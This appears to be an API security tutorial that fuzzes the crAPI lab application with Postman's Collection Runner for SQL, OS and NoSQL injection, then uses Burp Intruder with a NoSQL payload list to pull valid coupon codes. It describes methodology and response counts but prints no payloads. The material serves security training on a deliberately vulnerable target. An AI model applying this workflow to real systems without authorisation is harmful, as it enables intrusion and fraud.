Fuzzing Wide with Postman
Last updated
Last updated
Postman really shines when it comes to testing an entire API collection thanks to the Collection Runner. Whereas, Burp Suite CE and WFuzz are much better at digging into individual requests. Since there are so many places for an injection vulnerability to hide it helps to cast a wide net across a collection for weaknesses with Postman and then transition to other tools. We will be testing so many requests that I recommend duplicating the entire collection so that we can add variables throughout the collection. This will continue to maintain the integrity of the original collection and let us develop a baseline of expected responses.
I have renamed the duplicate collection to crAPI_Swagger Fuzz. We can create a fuzzing environment that can be reused from one collection to another.
For injection targets, we will begin by casting a wide net and seeing which requests respond in interesting ways. Let's target many of the requests that include user input. With this in mind, I have selected the following requests.
PUT videos by id
GET videos by id
POST change-email
POST verify-email-token
POST login
GET location
POST check-otp
POST posts
POST validate-coupon
POST orders
Now let's use the original collection (crAPI_Swagger) and use the collection runner on our selected requests to develop our baseline. Remember that when you use the Collection runner you can select the requests that you want to test and you can save the responses.
Select the above 10 requests. Note, the baseline of requests and responses should contain well-formed requests and expected responses. We should not have a collection that fails because of authorization or because the resources are not found. The collection should be in a state where things primarily function as expected. Once again, using the Status 200 test set up in previous modules, update your token and run the entire collection to see what your baseline looks like. Take note of how many requests pass and fail.
In this baseline, we can see that there were:
Three 200 Success responses
Three requests received 500 Internal Server Error
Three 404 Not Found
One 403 Forbidden
You can explore the variety of reasons that each response was sent, but if you have well-formed requests then proceed. Now that we have a baseline, let's update our environment with some fuzzing variables.
Now depending on information from reconnaissance, you may want to start with a specific fuzzing variable. However, it is easy enough to update the values of the variables, so I will stick with {{fuzz}}. Now go through the requests that you are targeting and add fuzzing variables where user input is found.
Now run the collection with the fuzz variable set throughout the targeted requests and investigate the results for anomalies.
In this test the total count was:
One 200 Success
Four 500 Internal Server Error
Three 404 Not Found
One 400 Bad Request
In this case, one request passed which should be interesting enough to explore the response. Sure enough, the community request did not have any issues, and posted the fuzzing variables in a community post. Also, make sure to explore the "Failed" results for anything anomalous or interesting. In the case of fuzzing you could find a verbose error message. Reviewing these results did not come up with anything interesting. Next, we will repeat this process with updated fuzzing variables.
Simply update the current value of fuzz with a new test, then use the collection runner, and review the results for anomalies.
Sure enough, we see very similar results. In this test the total count was:
One 200 Success
Four 500 Internal Server Error
Two 404 Not Found
Three 400 Bad Request
The community post was successful while the others failed in similar ways. There was some deviation in the number of 400 Bad Requests, but after investigating those results the responses were expected. This is exactly what you would hope to see, a new baseline developing. When we fuzz with certain types of input the application behaves in an expected way. Therefore, if we see update our fuzz variable to the right value then any changes will be much more obvious. Up to this point, we have tried a SQL injection test and an OS injection test. Let's try a NoSQL injection test.
At first glance, this test is slightly different. The community post was not successful and upon reviewing the failed results we see the count has changed:
One 500 Internal Server Error
Eight 400 Bad Request
One 422 Unprocessable Entity
The variation in the results here is worthy of investigation, especially with the new response. First, the request to the forum that was successful is now a 400 with the response body, {"error": "invalid character '$' after object key:value pair"}
The POST validate-coupon request has the 422 Unprocessable Entity response and also contains the same error in the response body.
These two requests are worth exploring further in Burp Suite. Proxy these two requests to Burp Suite and send the captured requests to Intruder.
Using Intruder, update the attack positions for the two requests that you are targeting.
Since the NoSQL payload was the one that triggered an anomaly, update Intruder with a NoSQL payload list. Try this attack with Payload Encoding turned on/off to see if you notice a difference in the responses. Send the attack.
Now we are receiving several "200 Success" responses and we have obtained valid coupon codes for sending true statements to the database. We have successfully exploited a NoSQL vulnerability! Next, let's check out how this would be performed with WFuzz.